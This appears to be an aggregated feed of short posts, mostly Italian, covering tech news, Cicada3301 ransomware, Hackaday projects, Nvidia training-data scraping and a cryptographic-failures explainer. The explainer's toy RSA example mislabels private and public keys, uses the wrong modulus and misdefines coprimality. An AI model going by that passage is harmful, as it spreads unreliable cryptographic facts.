Intel è recentemente assurta all’onore delle cronache per un “crollo” notevole, in effetti il suo core business, le CPU da desktop e laptop non vanno male, è crollata la sua strategia “IA” dove immaginava datacenter per pilotare sul suo ferro auto connesse, autonome, che altri sognavano di realizzare sopra di loro e han fallito. Nvidia è caduta meno, ma anche lei soffre perché i videogiochi vanno, ma alla fin fine la bolla IA si sgonfia, i più non trovano un uso che giustifichi il costo degli LLM e lato video si, per alcuni lavori artistici la generazione di immagini è buona ma non giustifica il costo in generale. Si è lanciato commercialmente qualcosa che non va nella società del presente e che tecnicamente non è davvero pronto, se non sulla carta.

dove probabilmente andremo


Per arrivare al futuro abbiamo bisogno di finanziamenti pubblici, compreso il valore di quel che possiamo realizzare per il pubblico, però questi non sono profitto privato puro, sono per il cittadino, quel che si crea ha da esser aperto, “public money, public code” e questo a big tech piace poco, anche perché se davvero guardiamo ciò che possiamo fare oggi vien fuori uno scenario simile al futuro immaginato da big tech, ma senza di loro, perché il modello servizio che vogliono risulta insostenibile, mentre il vecchio desktop personale connesso in rete mostra d’esser non solo possibile, ma persino necessario.

corsi e ricorsi della storia


Nel tempo s’è capito, poco alla volta tutte le tecnologie spinte per puro business han avuto il loro momento poi il declino, esempi moderni le GUI widget based, sostituite dalle WebUI, che sono interfacce documentali come lo erano al tempo della Xerox, i menu sostituiti pian piano da una “griglia riassuntiva” ben poco usata e da una ricerca “search&narrow” usata ogni giorno. L’introduzione di REPL, CLI ovunque un passetto timido alla volta sono ottimi indicatori; il boom e il crollo della virtualizzazione full-stack, sostituita dai container che cominciano a scricchiolare a loro volta sotto il loro stesso peso lo confermano. La tecnica alla fine prevale. Servono decenni però. L’evoluzione è lenta e non indolore, quel che si ottiene è circa quel che i pionieri immaginavano, ma in forme aliene rispetto all’immagine che si era fatta all’origine. Ecco la bolla tech d’oggi, non così d’oggi, che non finirà domattina, e la mappa temporale per orientarsi.

L'articolo Tecnologia moderna, tra Bolle, Licenziamenti e Intelligenza Artificiale. Cosa sta accadendo? proviene da il blog della sicurezza informatica.



Cicada3301: Il Ransomware-as-a-Service Scritto in Rust Colpisce 23 Organizzazioni in 3 Mesi


l malware e l’omonima cybergang Cicada3301 (intervistata in esclusiva da Red Hot Cyber in occasione dell’attacco alla AST Rhodense), è scritto in Rust per Windows e per Linux/ VMware ESXi.

È disponibile come servizio (Ransomware-as-a-Service, RaaS) e in tre mesi ha colpito 23 organizzazioni.

I primi casi di utilizzo di Cicada3301 sono stati registrati all’inizio di giugno. Alla fine dello stesso mese sul forum degli hacker Ramp è apparso l’annuncio del lancio di un programma di affiliazione basato su questo ransomware.
19064693
Un’analisi della versione Linux del malware effettuata svolta da Truesec ha rivelato grandi somiglianze con ALPHV/BlackCat. Durante la primavera scorsa gli operatori di questo RaaS sono fuggiti rubando 22 milioni di dollari a uno degli affiliati. Casi del genere sono conosciuti nel mondo dei criminali informatici come exit-scam.
19064695
Entrambi i ransomware sono scritti in Rust. Possono arrestare le macchine virtuali ed eliminare file, funzionano utilizzando l’algoritmo ChaCha20, hanno gli stessi nomi per le richieste di riscatto e utilizzano la crittografia intermittente su file pesanti.

Cicada3301 genera chiavi di crittografia in modo casuale (utilizzando la funzione OsRng) e le protegge utilizzando RSA .

Tutti i documenti e i file multimediali trovati vengono elaborati; se la dimensione supera i 100 MB, viene applicata la crittografia burst. Al nome dei file crittografati viene aggiunta un’estensione di sette caratteri arbitrari.

Agli affiliati viene data la possibilità di ritardare il lancio del crittografo (per una maggiore segretezza) e crittografare le VM senza disabilitare/cancellare lo stato corrente (le funzioni distruttive del malware sono abilitate per impostazione predefinita). Possono registrare le loro vittorie su un Data Leak Site (DLS).

L'articolo Cicada3301: Il Ransomware-as-a-Service Scritto in Rust Colpisce 23 Organizzazioni in 3 Mesi proviene da il blog della sicurezza informatica.



Gli obiettivi climatici europei? «Inadeguati». E le ong sfidano la Commissione in tribunale


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
In caso di successo, la causa potrebbe obbligare l’Unione a rivedere i suoi obiettivi climatici al 2030: dal 55 al 65% di emissioni in meno
L'articolo Gli obiettivi climatici europei? «Inadeguati». E le ong sfidano la Commissione in tribunale proviene da Valori.



Onda nera sulla Germania in crisi


@Notizie dall'Italia e dal mondo
Alternativa per la Germania vince le elezioni in due importanti Land orientali e minaccia la stabilità politica del paese dove la crisi economica continua a mordere
L'articolo Onda nera sulla Germania in crisi proviene da Pagine Esteri.

pagineesteri.it/2024/09/04/mon…



Calciomercato: Londra da sola ha speso il triplo dell’Arabia Saudita


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
I numeri del calciomercato ci dicono che la bolla è gonfiata dai fondi della City londinese, non certo dai campionati arabi
L'articolo Calciomercato: Londra da sola ha speso il triplo dell’Arabia Saudita proviene da Valori.

valori.it/calciomercato-londra…



College Gives You Practical Electronics


19061180

While classroom learning isn’t for everyone, one awesome benefit of the Internet is that you have a variety of college classes available to you, even if they aren’t for credit. You can virtually audit classes from institutions around the world on just about any topic you can think of. Of course, the topic we think of is practical electronics and that happens to be the title of a class from [Dr. Bill Newhall] of the University of Colorado. You can watch the first part in the video below. So far, there are two lectures available but more are coming as the class is ongoing right now.

[Dr. Newhall] is one of us. He’s a ham radio operator and a pilot, as well as an electrical engineer. This class is aimed at others who need to understand electronics in another context. It reminded us of the genesis of one of our favorite books — also from a professor — The Art of Electronics.

The course material promises to cover topics ranging from solar and battery power sources, power conversions, IoT and RF communications, sensors, and DC motor control. Of course, there will also be sections on microcontrollers and associated hardware.

Just like a real class, the first lecture has a lot of housekeeping information, but you might want to skim it anyway. But if you want to get to the electronics, the second video won’t disappoint. While it covers a lot of ground that is probably familiar to most Hackaday readers, it is a good review and there’s more coming in the future lectures.

With all the resources online, you can easily hack your own degree plan together. Having access to instructors like [Dr. Newhall] is exactly the point we were making about how the Internet allows you to leverage the best educational opportunities no matter where you are.

youtube.com/embed/zDnhcsxwNAo?…

youtube.com/embed/nW31fuX-i8c?…


hackaday.com/2024/09/03/colleg…



A Nibble Of Core Memory, In An SAO


19053471

Core memory, magnetised memory using tiny magnetic rings suspended on a grid of wires, is now more than five decades obsolete, yet it exerts a fascination for hardware hackers still. Not least [Andy Geppert], who’s made a nibble, four bits of it, complete with interactive LED illumination to show state. Best of all, it’s on a SAO for fun and games on a badge.

Aside from it being a fun project, perhaps the most interesting part comes in the GitHub repository, where can be found the schematic for the device. He’s built all the drive and sense circuitry himself rather than finding an old-stock core memory driver chip, which gives those of us who’ve never worked with this stuff the chance to understand how it works. Beyond that it takes the a2c from the Stemma or SAO ports to a GPIO expander, which provides all the lines necessary to drive it all.

To show it in action he’s posted a video which we’ve placed below the break. Particularly interesting is the use of a magnet to flip bits, something we guess is obvious, but was new to us. If you’re hungry for more, it’s not [Andy]’s first outing into core memory.

youtube.com/embed/id1_PEvV3Vw?…


hackaday.com/2024/09/03/a-nibb…



2024 Tiny Games Contest: Batch Craze Is Portable Charades, Kind Of


A small handheld word game called Batch Craze, where one player tries to get another to guess the word on the screen.

So there’s this commercial electronic game out there called Catch Phrase, which, as the game’s own catch phrase explains, is the game that’s played one word at a time. See, a word comes up on the screen, and you have to get the other person or team to guess what it is using gestures and such before the timer goes off. There are a bunch of rules, like you can’t say a word that rhymes, give the first letter, or the number of syllables.

Well, [ahixson1230] and company got their hands on the After Dark NSFW version but found it lacking in the edginess department. So naturally, [ahixson1230] was inspired to build a better one, with a touch screen in lieu of buttons, and a way for players to suggest words to be added to the list. In this version, a player presses anywhere on the screen to start the game, and a random word or phrase comes up. They act it out, get the other person to guess, and then pass the unit over to continue the fun.

Batch Craze is based on the Cheap Yellow Display, aka the ESP32-2432S028R, and [ahixson1230] highly recommends [witnessmenow]’s excellent resource on the subject. As of this writing, [ahixson1230] is still trying to get the speaker to work, and welcomes any help. Can you assist?

There’s still time to enter the 2024 Tiny Games Contest! You have until Tuesday, September 10th, so head on over to Hackaday.IO and get started!

2024 Tiny Games Challenge


hackaday.com/2024/09/03/2024-t…



Il Lato Oscuro della Crittografia: Quando Gli Algoritmi Ti Tradiscono


I fallimenti crittografici (Cryptographic Failures), sono un problema maledettamente serio, tanto da essere uno dei OWASP TOP 10 nella posizione A2, scalando una posizione dal 2017 (qui il sito ufficiale). Se pensi che tutti i tuoi dati che transitano in rete o che sono conservati nei server sono (o dovrebbero essere) crittografati, capisci che un fallimento aprirebbe scenari catastrofici, ma sento arrivare la domanda…come possono accadere?

Se fossero storie…sarebbero state scritte da Edgar Allan Poe…

I principali motivi di fallimento di un algoritmo crittografico sono :

  1. implementazione vulnerabile
  2. utilizzo di algoritmi deboli
  3. debolezza nella generazione delle chiavi

Seguimi in una storia di terrore crittografico: Heartbleed

Fallimenti Crittografici: HEARTBLEED


Nel 2014, fu scoperta una vulnerabilità in OpenSSL, una libreria molto utilizzata in quanto progetto Open Source per aiutare l’implementazione di SSL/TLS (il famoso lucchetto in alto a sinistra nel Browser per esempio) nelle comunicazione via internet rendendole crittografate e quindi più sicure.
Questa vulnerabilità sconvolse il mondo di internet: permetteva agli attaccanti di leggere porzioni di memoria del server, potenzialmente esponendo chiavi private, nomi utente, password e altri dati sensibili.

Un esempio di fallimento crittografico che ha avuto conseguenze disastrose.

Questa falla fu introdotta nel 2012 (quindi è stata attiva per circa 2 anni) nella versione 1.0.1 della libreria insieme all’estensione Heartbeat. Vediamo di capirci qualcosa.

La nuova funzionalità introdotta, Heartbeat, faceva una cosa semplice: verificava che la connessione SSL/TLS fosse ancora attiva. Come lo faceva?

Il client mandava un messaggio Heartbeat contenente dei dati specificandone la dimensione al server e questo rispondeva al cliente con gli stessi dati, specificandone a sua volta la dimensione.

Tutto molto lineare, ma allora il problema che scatenò il panico mondiale dove sta?

Nei dettagli…Non avevano previsto di controllare che la dimensione dei dati dichiarata nel messaggio heartbeat fosse uguale a quella dei dati inviati.

Mandando per esempio 1 byte di dati ma dichiarandone 200, il server rispondeva con il byte di dati inviato e 199 byte di dati presi dalle celle di memoria adiacenti al fine di arrivare a 200 byte. Simpatico vero? In questo modo il server avrebbe potuto inviare qualsiasi tipo di dato: password, dati personali, chiavi crittografiche etc.etc.

Comunque questa storia ha un lieto fine: una volta scoperto fu prontamente risolto.

Quando il sale serve…sulle password


Cambiando decisamente paradigma, passiamo da una storia dell’orrore di fallimenti crittografici a questioni di cucina: benché esista il detto “troppo salato si butta, non salato si mangia” il sale crittografico sulle password serve. Non metterlo esporrebbe dati sensibili come le password a vulnerabilità crittografiche come l’attacco con Rainbow Table. Ma andiamo per ordine.

Gli hash. Oggi il 99,99% dei salvataggi di una password avviene sotto forma di hash (per saperne di più c’è l’articolo del nostro Davide Cavallini qui. Con la speranza che il nostro Davide non me ne voglia, ne do una definizione in campo gastronomico: immagina di avere una pietanza (la password) che inserisci in un calderone (la funzione hash). Da questo calderone esce una pozione unica (l’hash), che rappresenta la tua pietanza in modo unico. Le caratteristiche di questa pozione sono:

  1. anche un piccolo cambiamento nella pietanza cambia completamente la pozione.
  2. la stessa chiave produce sempre la stessa pozione
  3. è impossibile risalire alla chiave originale dalla pozione
  4. è molto difficile trovare due pietanze diverse che producano la stessa pozione.

Gli arcobaleni pericolosi. Sfortunatamente oggi esistono tabelle (chiamate Rainbow Tables) di hash di password già calcolati con cui tentare di decifrare quelli rubati. Quindi nessuno sforzo ed ad oggi il solo algoritmo di hashing risulta debole visti gli strumenti che ci sono in giro.

Salatura degli hash. Qui interviene il sale (in gergo tecnico si utilizza veramente la parola “salt” ossia sale in inglese quindi il paragone culinario mi è parso adeguato) : come è un potente conservante in campo alimentare, così lo è anche in campo crittografico. Ora, immagina di aggiungere un pizzico di sale alla tua chiave magica prima di metterla nel calderone. Questo rende la pozione ancora più unica. Ecco i vantaggi:

  • anche usando la stessa pietanza, le due pozioni saranno diverse grazie al sale
  • le rainbow tables diventano inutili perché ogni pozione richiede una combinazione unica di pietanza e sale

Quindi la salagione della password è un rafforzamento della difesa crittografica per cui il mancato utilizzo ne crea una vulnerabilità.

Una chiave debole


“Tra bit danzanti,segreti cifrati.Crittografia.” Questo antico componimento ci svela un grande segreto: la crittografia è intorno a noi, ci abbraccia e ci accompagna con la sua presenza discreta. Ma quando ci sono dei fallimenti crittografici? Hai mai apposto una firma digitale? Se lo hai fatto, hai usato un modalità crittografica chiamata crittografia asimmetrica. Hai firmato il documento cifrandolo con la tua chiave privata. Di questa chiave ne esiste una derivata chiamata chiave pubblica con la quale, in quanto pubblica, chiunque potrà decifrare il documento e quindi verificare che la firma sia tua.

Anche se la chiave privata è correlata alla chiave pubblica, da questa non si può ricavare, a meno che
Gli algoritmi utilizzabili per la generazione dell chiavi e porre in essere la crittografia asimmetrica, sono di pubblico dominio, quindi non c’è alcun segreto.

Dove sta la forza allora se si conosce il metodo di cifratura?? La forza sta nelle chiavi.

Tutta l’architettura si basa sullo sforzo computazionale esagerato sia in termini di energia che di tempo che servirebbe per trovare la chiave privata da quella pubblica. Ammesso che ci volessero 3.000 anni (ma sono molti di più) per trovare la chiave privata e quindi falsificare la tua firma…che senso avrebbe?

Ma potevo non raccontarti una storia sui fallimenti crittografici? Se hai letto i miei precedenti articoli ormai mi conosci…

C’era una volta un matematico appassionato di sfide intellettuali e di enigmi crittografici viveva in una piccola casa ai margini di un bosco, lontano dai clamori della città, circondato da libri polverosi e fogli di carta pieni di equazioni. Aveva sempre sognato di affrontare l’algoritmo RSA nonostante la mancanza di strumenti moderni, possedeva una mente acuta e una passione incrollabile per la matematica.

Era affascinato dalla possibilità di creare un sistema di crittografia sicuro basato solo sulla teoria dei numeri e sui calcoli matematici. Decise di mettersi alla prova e di implementare l’algoritmo RSA con carta e penna. Si sedette al suo tavolo, prese un foglio di carta bianca e iniziò a scrivere con il suo fidato pennino.

Come prima scelse due numeri primi casuali che chiamò P e Q. P= 5 e Q = 17. Fatta questa scelta, calcolò il parametro n dato dalla moltiplicazione di P e Q n = P ∙ Q = 5 ∙ 17 = 85. Il parametro n, quindi 85,sarà il modulo con cui lavorerà. Il secondo parametro che scaturisce dalla scelta di P e Q lo calcolò così: z = (P-1) ∙ (Q-1) = 4 ∙ 16 = 64 . z è il numero dei numeri coprimi relativi al modulo 85. Ci sono 64 numeri per cui se divido 85 per uno di questi, non ottengo un numero intero.

Generazione delle chiavi. Doveva scegliere un numero, che indicò con e, tale che fosse coprimo rispetto a z ed inferiore a 85. Scelse 5 visto che che se divideva 64 per 5 non otteneva un numero intero ed era inferiore ad 85 quindi e=5. Aveva generato la prima chiave (privata) che era Kpriv = (5,85) !! Adesso doveva calcolare la chiave pubblica. Doveva calcolare il numero d tale che d ∙ e = 1mod (85). Significa che la moltiplicazione di d per e doveva essere un multiplo di 64 più uno. Il primo multiplo di 64 più che trovò fu 65. Lo divise per 5 e trovo 13. Quindi: d = 13.

Ecco la chiave pubblica Kpub = (d,n) = (13, 85) !!!

Visti i numeri in gioco, si capisce benissimo che con un calcolatore automatico, a forza di prova, può essere trovata la chiave privata da quella pubblica vista la sua debolezza. Quindi un algoritmo crittografico valido può essere reso insicuro da una chiave eccessivamente debole.

L'articolo Il Lato Oscuro della Crittografia: Quando Gli Algoritmi Ti Tradiscono proviene da il blog della sicurezza informatica.



A Clean Linux Installation For an Android TV Box


19036075

Although Android technically runs on top of Linux, generally most Android devices abstract away the underlying Linux-ness of these machines. In theory this is a good thing; we wouldn’t necessarily want to live in a world where we have to log in to a command-line interface just to make a phone call. But too much abstraction often needlessly restricts the capabilities of the underlying hardware. [Murray] a.k.a [Green Bug-Eyed Monster] has an Android TV box with just such a problem, as the Android OS included with it allows for watching TV just fine, but with a few tweaks it can run a full Linux installation instead, turning it into a much more versatile machine.

This specific Android TV box is based on the Rockchip 3566, a popular single-board computer used in a wide array of products. As such it is one of the easier targets for transforming a limited TV machine into a fully capable desktop computer. The first step is to compile an Armbian image for the machine, in this case using an x86 installation of Ubuntu to cross-compile for the ARM-based machine. With a viable image in hand, there’s an option to either solder on a microSD slot to the included pins on the computer’s PCB or to flash the image directly to the on-board eMMC storage by tricking the machine into thinking that the eMMC is missing. Either option will bring you into a full-fledged Linux environment, with just a few configuration steps to take to get it running like any other computer.

[Murray] began this process as an alternative to paying the inflated prices of Raspberry Pis over the past few years, and for anyone in a similar predicament any computer with the Rockchip 3566 processor in it could be a potential target for a project like this. You might need to make a few tweaks to the compile options and hardware, but overall the process should be similar. And if you don’t have an RK3566, don’t fret too much. We’ve seen plenty of other Android TV boxes turned into similar devices like this one which runs RetroPie instead.


hackaday.com/2024/09/03/a-clea…



Mowing the Lawn With Lasers, For Science


19030191

Wouldn’t it be cool if you could cut the grass with lasers? Everyone knows that lasers are basically magic, and if you strap a diode laser or two to a lawn mower, it should slice through those pesky blades of grass with zero effort. Cue [Allen Pan]’s video on doing exactly this, demonstrating in the process that we do in fact live in a physics-based universe, and lasers are not magical light sabers that will just slice and dice without effort.

The first attempt to attach two diode lasers in a spinning configuration like the cutting blades on a traditional lawn mower led to the obvious focusing issues (fixed by removing the focusing lenses) and short contact time. Effectively, while these diode lasers can cut blades of grass, you need to give them some time to do the work. Naturally, this meant adding more lasers in a stationary grid, like creating a Resident Evil-style cutting grid, only for grass instead of intruders.

Does this work? Sort of. Especially thick grass has a lot of moisture in it, which the lasers have to boil off before they can do the cutting. As [Allen] and co-conspirator found out, this also risks igniting a lawn fire in especially thick grass. The best attempt to cut the lawn with lasers appears to have been made two years ago by [rctestflight], who used a stationary, 40 watt diode laser sweeping across an area. When placed on a (slowly) moving platform this could cut the lawn in a matter of days, whereas low-tech rapidly spinning blades would need at least a couple of minutes.

Obviously the answer is to toss out those weak diode lasers and get started with kW-level chemical lasers. We’re definitely looking forward to seeing those attempts, and the safety methods required to not turn it into a laser safety PSA.

youtube.com/embed/a0H0vOWUjbY?…


hackaday.com/2024/09/03/mowing…



il nuovo codice per air bnb e simili, ma


"1.5 Le case religiose di ospitalità no-profit sono soggette all’obbligo di CIN?
No, qualora l’attività di ospitalità sia svolta a titolo meramente gratuito. Le libere donazioni corrisposte dagli ospiti non fanno venir meno la gratuità della prestazione offerta. "
ministeroturismo.gov.it/faq-ba…
E vabbè
Unknown parent

friendica (DFRN) - Collegamento all'originale
Andrea R.
@marcoboh 🏳️‍🌈
Non c'è male.
San Zuzzurro delle tasche, non mi far pagar le tasse.
San Pirillo delle olive amare, l'imu non farmi pagare.


If you got an email containing your address and a PDF with a photo of your street, don't freak out: it's a fake sextortion scheme.

If you got an email containing your address and a PDF with a photo of your street, donx27;t freak out: itx27;s a fake sextortion scheme.#News

#News #x27


Supercon 2023: Teaching Robots How to Learn


19024845

Once upon a time, machine learning was an arcane field, the preserve of a precious few researchers holed up in grand academic institutions. Progress was slow, and hard won. Today, however, just about anyone with a computer can dive into these topics and develop their own machine learning systems.

Shawn Hymel has been doing just that, in his work in developer relations and as a broader electronics educator. His current interest is reinforcement learning on a tiny scale. He came down to the 2023 Hackaday Supercon to tell us all about his work.

Rewards Are Everything


Shawn finds reinforcement learning highly exciting, particularly when it comes to robotics. “We’re now getting into the idea of, can robots not just do a thing you tell them to, but can they learn to do the thing you tell them to?” he says. Imagine a robot copter that learns to fly itself, or a self-driving car that intuitively learns to avoid pedestrians. The dream is robots that do not simply blindly follow orders, but learn and understand intuitively what to do.
19024847The reinforcement learning system for controlling an inverted pendulum.
Obviously, a great deal of machine learning research involves teams of PhDs and millions of dollars in funding. As an individual, Shawn decided to start smaller. Rather than try and build an advanced quadripedal robot that could teach itself to walk, he instead started with a simple inverted pendulum. It’s a classical control theory project, but he set about getting it to work with reinforcement learning instead.

Reinforcement learning is all about observation. The AI in charge of the inverted pendulum can see the position of the pendulum, and its angular velocity. It can also swing it around with a stepper motor, and knows the stepper motor’s angle and velocity. The reinforcement part involves setting a “reward” for the desired position of the pendulum—namely, when it’s balancing in the inverted position. Thus, over time, the AI learns which actions correspond to this reward, and it effectively “learns” how to control the system.

As is often the way, Shawn’s first attempts didn’t work. There was too much latency between the measurements from the inverted pendulum being sent from an Arduino via serial reaching the AI agent running on his computer’s GPU. Thus, he simplified things. Instead of trying to get the pendulum to balance, he decided to just try and teach an AI to swing it up vertically. He also decided to run the AI on a microcontroller, eliminating much of the latency involved in trying to train a model on his GPU. He also simplified the action space—rather than continuous control of the stepper, the AI was only able to make three actions. Either add 10 degrees, subtract 10 degrees, or do nothing.
19024850The initial reward function is developed to optimize keeping the pendulum vertical and not moving.
This proved far more successful. He was able to train a model using the Stable Baselines3 framework that could successfully make positive actions towards flipping up the pendulum. Once trained using the actor-critic method, the actor half of the model could be deployed to a microcontroller and tested on the real system.

He used Edge Impulse to compress the model and ran it on a Seeed Studio XIAO ESP32S3. The microcontroller no longer needs to run the reward function, as it’s already been trained on how to act to get the desired result. It just goes ahead and does its thing. The live demo worked, too — the model was able to swing the pendulum (briefly) into the vertical position.

Finding the Best Tool for the Job


Shawn notes that for reinforcement learning tasks like these, virtual training grounds can be of great value. They allow much training to happen much faster, often with thousands of iterations running in parallel. There’s also less hassle versus training models on real mechanical hardware, which can get damaged or require manual resets after each training run.

All this is not to say that reinforcement learning is the be-all and end-all of robotics these days. As Shawn explains, for many tasks, particularly straightforward and repetitive ones, classical control theory remains supreme. Just because you can do a task with machine learning techniques, doesn’t mean it’s the best way to go about it.

Ultimately, reinforcement learning can help a machine achieve all kinds of complicated tasks. The trick is to create the right reward function and measure the right parameters. As Shawn ably demonstrates, choosing an appropriately simple goal is also a great way to get started!

youtube.com/embed/50R5EsQB5Rw?…


hackaday.com/2024/09/03/superc…



Nvidia sotto accusa: video YouTube e Netflix usati per addestrare AI senza permesso


Nvidia ha utilizzato video da YouTube e altre fonti per addestrare i suoi prodotti AI, secondo le e-mail interne e i documenti ottenuti da 404 Media.

Discutendo gli aspetti legali ed etici dell’utilizzo di contenuti protetti da copyright per addestrare modelli di intelligenza artificiale, Nvidia ha affermato che le loro azioni sono pienamente conformi alla legge sul copyright. Conversazioni interne tra i dipendenti di Nvidia mostrano che quando i dipendenti sollevavano domande su potenziali questioni legali, i manager assicuravano loro che hanno il permesso di utilizzare i dati da parte del top management dell’azienda.

Un ex dipendente di Nvidia ha affermato che ai lavoratori è stato chiesto di scaricare video da Netflix, YouTube e altre fonti per addestrare modelli di intelligenza artificiale, come il generatore di mondi 3D Omniverse, sistemi di auto a guida autonoma e prodotti come “umani digitali”. Il progetto, denominato Cosmos, non è stato ancora presentato al grande pubblico.

L’obiettivo di Cosmos è creare un modello di generazione video all’avanguardia in grado di simulare luce, fisica e intelligenza in un unico posto, permettendo a Cosmos di essere usato in una varietà di applicazioni. Dalle comunicazioni interne emerge che i dipendenti hanno utilizzato il programma open source yt-dlp per scaricare video da YouTube, aggirando i blocchi attraverso macchine virtuali con indirizzi IP aggiornati.

I project manager hanno parlato dell’utilizzo di 20-30 macchine virtuali in Amazon Web Services utilizzate per scaricare l’equivalente di 80 anni di video ogni giorno. A maggio, un portavoce di Nvidia ha detto che la società stava completando la prima versione della sua pipeline di dati e si stava preparando a costruire una fabbrica di dati video che avrebbe “generato ogni giorno una quantità di dati pari a una vita intera“.

Google e Netflix hanno confermato che l’utilizzo dei loro contenuti da parte di Nvidia costituisce una violazione dei loro termini di servizio. Ai dipendenti di Nvidia con problemi legali è stato detto dai manager che si trattava di una “decisione esecutiva” e che non dovevano preoccuparsene.

Tuttavia, molti ricercatori e avvocati sostengono che l’uso di contenuti protetti da copyright per addestrare l’intelligenza artificiale sia una questione legale aperta. Negli ultimi anni è diventato più comune per gli accademici concedere in licenza i propri dati di ricerca per uso non commerciale.

Il progetto Cosmos prevedeva l’uso di video sia pubblici che interni, nonché di dati raccolti dai ricercatori. Tuttavia, le licenze per molti di questi set di dati ne limitano l’uso ai soli scopi accademici

L'articolo Nvidia sotto accusa: video YouTube e Netflix usati per addestrare AI senza permesso proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



question, When were programmers supposed to be obsolete?


!Programmer Humor
Hi, this is a question that popped into my mind when i saw an article about some AWS engineer talking about ai assistants taking over the job of programmers, this reminded me that it's not the first time that something like this was said.

My software engineering teacher once told me that a few years ago people believed graphical tools like enterprise architect would make it so that a single engineer could just draw a pretty UML diagram and generate 90% of the project without touching any code,
And further back COBOL was supposed to replace programmers by letting accountants write their own programs.

Now i'm curious, were there many other technologies that were supposedly going to replace programmers that you remember?

i hope someone that's been around much more than me knows something more or has some funny stories to share

in reply to Giovanni Petri

Oracle has a product called Oracle Policy Automation (OPA) that it sells as "you can write the rules in plain English in MS Word documents, you don't need developers". I worked for an insurance organization where the business side bought OPA without consulting IT, hoping they wouldn't have to deal with developers. It totally failed because it doesn't matter that they get to write "plain English" in Word documents. They still lack the structured, formal thinking to deal with anything except the happiest of happy paths.

The important difference between a developer and a non-developer isn't the ability to understand the syntax of a programming language. It's the willingness and ability to formalize and crystallize requirements and think about all the edge cases. As an architect/programmer when I talk to the business side, they get bored and lose interest from all my questions about what they actually want.

Questa voce è stata modificata (1 anno fa)
in reply to Giovanni Petri

  • can AI replace the job of a real programmer, or a team of software engineers? Probably not for a long time.
  • can manager abuse the fantasy that they could get rid of those pesky engineers that dare telling them something is impossible? Yes totally. If they believe adding an AI tool to a team justifies a 200% increase in productivity. Some managers will fire people against all metrics and evidence. Calling that move a success. Same occurred when they try to outsource code to cheaper teams.


🔁 L'autorità olandese per la protezione dei dati ha multato Clearview AI di 30 milioni di euro per la "raccolta illegale di dati per il riconoscime...

L'autorità olandese per la protezione dei dati ha multato Clearview AI di 30 milioni di euro per la "raccolta illegale di dati per il riconoscimento facciale"!

Oltre alla multa di 30,5 milioni di euro, commina a Clearview AI una sanzione per inade…



Decisione blitz sul #chatcontrol? L'Ungheria vuole far passare i piani senza precedenti dell'UE per la sorveglianza di massa della messaggistica

Domani consultazioni UE sulla sorveglianza della messaggistica, conosciuta come #ChatControl: l'Ungheria…



Dichiarazione congiunta della società civile sull'uso dello spyware di sorveglianza nell'UE e oltre

CDT Europe pubblica una dichiarazione congiunta con una coalizione di organizzazioni della società civile, invitando le istituzioni dell'UE a regolam…



Droni navali e sistemi autonomi. Ecco l’accordo della cantieristica francese

[quote]Quella dell’importanza crescente dei veicoli a pilotaggio remoto (i cosiddetti droni) nelle operazioni di combattimento è una delle principali lezioni apprese dal conflitto russo-ucraino, non solo nelle loro configurazioni aeree, ma anche in versioni terrestri e soprattutto navali. È infatti in